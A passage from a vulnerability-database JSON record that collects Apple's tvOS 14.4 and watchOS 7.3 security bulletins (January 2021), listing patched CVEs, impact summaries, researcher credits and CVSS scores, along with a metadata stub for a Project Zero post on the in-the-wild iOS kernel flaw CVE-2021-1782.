"privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-14T00:00:00", "type": "googleprojectzero", "title": "\nCVE-2021-1782, an iOS in-the-wild vulnerability in vouchers\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1772", "CVE-2021-1782", "CVE-2021-30737"], "modified": "2022-04-14T00:00:00", "id": "GOOGLEPROJECTZERO:9451D3A58B2FB50EEDDD4A74CE240CDE", "href": "https://googleprojectzero.blogspot.com/2022/04/cve-2021-1782-ios-in-wild-vulnerability.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2021-02-02T04:44:57", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 14.4\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021\n\n**APFS**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**CoreGraphics**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021\n\n**CoreMedia**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021\n\n**FairPlay**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu (@pwn0rz), Qi Sun & Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin from Ant-financial Light-Year Security Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1746: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Qi Sun of Trend Micro\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**IOSkywalkFamily**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021\n\n**iTunes Store**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: Maxime Villard (m00nbsd)\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Swift**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T06:39:19", "title": "About the security content of tvOS 14.4 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1818", "CVE-2021-1772", "CVE-2021-1778", "CVE-2021-1743", "CVE-2021-1769", "CVE-2021-1761", "CVE-2021-1792", "CVE-2021-1757", "CVE-2021-1744", "CVE-2021-1786", "CVE-2021-1791", "CVE-2021-1748", "CVE-2021-1773", "CVE-2021-1758", "CVE-2021-1787", "CVE-2021-1760", "CVE-2021-1746", "CVE-2021-1785", "CVE-2021-1759", "CVE-2021-1741", "CVE-2021-1747", "CVE-2021-1801", "CVE-2021-1799", "CVE-2021-1788", "CVE-2021-1782", "CVE-2021-1766", "CVE-2021-1783", "CVE-2021-1797", "CVE-2021-1793", "CVE-2021-1776", "CVE-2021-1789", "CVE-2021-1764", "CVE-2021-1750"], "modified": "2021-02-01T06:39:19", "id": "APPLE:HT212149", "href": "https://support.apple.com/kb/HT212149", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-02T04:43:06", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 7.3\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021\n\n**APFS**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021\n\n**CoreAnimation**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**CoreGraphics**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021\n\n**FairPlay**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu (@pwn0rz), Qi Sun & Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**FontParser**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin from Ant-Financial Light-Year Security Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1746: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Qi Sun of Trend Micro\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**IOSkywalkFamily**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021\n\n**iTunes Store**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: Maxime Villard (m00nbsd)\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Swift**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-01T06:39:19", "title": "About the security content of watchOS 7.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1818", "CVE-2021-1772", "CVE-2021-1778", "CVE-2021-1743", "CVE-2021-1769", "CVE-2021-1761", "CVE-2021-1792", "CVE-2021-1757", "CVE-2021-1744", "CVE-2021-1786", "CVE-2021-1791", "CVE-2021-1748", "CVE-2021-1773", "CVE-2021-1758", "CVE-2021-1787", "CVE-2021-1760", "CVE-2021-1746", "CVE-2021-1785", "CVE-2021-1741", "CVE-2021-1747", "CVE-2021-1801", "CVE-2021-1799", "CVE-2021-1788", "CVE-2021-1782", "CVE-2021-1766", "CVE-2021-1783", "CVE-2021-1797", "CVE-2021-1793", "CVE-2021-1776", "CVE-2021-1789", "CVE-2021-1764", "CVE-2021-1750"], "modified": "2021-02-01T06:39:19", "id": "APPLE:HT212148", "href": "https://support.apple.com/kb/HT212148", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-30T06:02:31", "description": "# About the security content of watchOS 7.3\n\nThis document describes the security content of watchOS 7.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## watchOS 7.3\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021\n\n**APFS**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021\n\n**CoreAnimation**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**CoreAudio**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**CoreGraphics**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**CoreText**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021\n\n**FairPlay**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu(@pwn0rz), Qi Sun and Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**FontParser**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry added March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei 